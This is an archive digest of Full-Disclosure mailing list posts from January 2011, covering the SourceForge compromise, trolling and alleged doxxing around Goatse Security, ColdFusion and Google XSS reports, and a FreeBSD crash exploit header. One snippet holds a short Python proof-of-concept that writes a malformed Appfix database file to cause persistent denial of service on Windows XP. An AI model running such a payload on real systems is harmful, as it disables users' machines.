Re: [Full-disclosure] sourceforge entry point seems still active.

Another update from HN and official response from sourceforge team: the sourceforge entry point seems still active http://extraexploit.blogspot.com/2011/01/sourceforge-entry-point-seems-still.html Sourceforge servers compromised http://news.ycombinator.com/item?id=2150639 SourceForge.net Attack

Re: [Full-disclosure] http://security.goatse.fr/gaping-hole-exposed

haa haaa now weev is getting it in the ass both in and out of prison 2011/1/27 Leon Kaiser litera...@gmail.com BIG UPS TO KRASHED *Leon Kaiser* - Head of GNAA Public Relations - litera...@gnaa.eu || litera...@goatse.fr

[Full-disclosure] FreeBSD local denial of service - forced reboot

# Exploit Title: FreeBSD local denial of service - forced reboot # Date: 28. January 2011 # Author: Kingcope # Software Link: http://www.freebsd.org # Operating System: FreeBSD # Tested on: 8.0-RELEASE This source code when compiled and executed will reboot at least FreeBSD 8.0-RELEASE because of

[Full-disclosure] Egypt Telecom AS isolation - BGPlay show it ?

If you are interested http://extraexploit.blogspot.com/2011/01/egypt-telecom-as-isolation-bgplay-show.html Regards -- http://extraexploit.blogspot.com ___ Full-Disclosure - We believe in it. Charter:

[Full-disclosure] nullcon Goa Dwitiya security Conference 25-26th Feb 2011

Greetings from null! null - The open security community (registered non-profit society) is back with nullcon Goa Dwitiya - International Security Hacking conference. We have some amazing talks lined up this time around that will surely change your perspective of security in the future. We thank

[Full-disclosure] Malformed Package Appfix files - Local Persistent Denial Of Service

; Proof-of-Concept, tested on WINDOWS XP SP2 5.1.2600 FR (thx momo) #/usr/bin/env python import sys f=open('C:\\WINDOWS\\AppPatch\\systest.sdb','w') f.write('\x02\x00\x00\x00\xFF\xFF\x00\x00\x73\x64\x62\x66\x02\x78\xFF\xFF\x00\x00') f.close() Note: Make sure you have sufficient permissions to

[Full-disclosure] Go away anonymous

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Go away anonymous

wow cool story bro 2011/1/28 RandallM randa...@fidmail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Full-Disclosure] http://security.goatse.fr/gaping-hole-exposed (is a troll)

Actually, it was a former member of Goatse Security. (http://security.goatse.fr/gaping-hole-exposed) Leon Leon Kaiser - Head of GNAA Public Relations - litera...@gnaa.eu || litera...@goatse.fr http://gnaa.eu ||

Re: [Full-disclosure] [Full-Disclosure] http://security.goatse.fr/gaping-hole-exposed (is a troll)

The person who did it was not a member of Goatse Security. It was a moron who thought that this would be funny. (The person in question is the guy who actually posted it on Full-Disclosure in the first place, Andrew Kirch) Leon Leon Kaiser

[Full-disclosure] Andrew trelane Kirch EXPOSED

http://www.dailytech.com/Goatse+Security+Defaced+Perpetrators+Alleged +Identity+Revealed+/article20776.htm Leon Kaiser - Head of GNAA Public Relations - litera...@gnaa.eu || litera...@goatse.fr http://gnaa.eu ||

Re: [Full-disclosure] Andrew trelane Kirch EXPOSED

Good god no-one cares. Sent from my BlackBerry® wireless device -Original Message- From: Leon Kaiser litera...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 28 Jan 2011 09:25:13 To: full-disclosure@lists.grok.org.uk Reply-To: litera...@gnaa.eu Subject:

Re: [Full-disclosure] [Full-Disclosure] http://security.goatse.fr/gaping-hole-exposed (is a troll)

At the risk of having the eyes of the spiteful turned on me... It's kind of funny how these sorts of groups seem to be governed by a pursuit of the lulz -- that is, personal amusement/schadenfreude at the expense of someone else, usually as a result of their own actions. But ironically, if Mr.

Re: [Full-disclosure] www.google.com xss vulnerability Using mhtml

FYI, here's a provisional advisory from Microsoft acknowledging this issue: http://www.microsoft.com/technet/security/advisory/2501696.mspx /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html

[Full-disclosure] Vulnerabilities in Adobe ColdFusion

Hello list! I want to warn you about SQL DB Structure Extraction, Full path disclosure and Cross-Site Scripting vulnerabilities in Adobe ColdFusion. The vulnerabilities exist at detailed error report page. At 16.11.2010 I privately informed Adobe about it, but they ignored my letter.

Re: [Full-disclosure] [Full-Disclosure] http://security.goatse.fr/gaping-hole-exposed (is a troll)

  it seems to be not quite so funny for the lulz-seekers when it happens to them. http://www.dailytech.com/Goatse+Security+Defaced+Perpetrators+Alleged+Identity+Revealed+/article20776.htm ___ Full-Disclosure - We believe in it. Charter:

Re: [Full-disclosure] www.google.com xss vulnerability Using mhtml

nice work to MS now, let us to wait for the FIX . . gogogo [image: 2000] hitest 2011/1/28 Michal Zalewski lcam...@coredump.cx: FYI, here's a provisional advisory from Microsoft acknowledging this issue: http://www.microsoft.com/technet/security/advisory/2501696.mspx /mz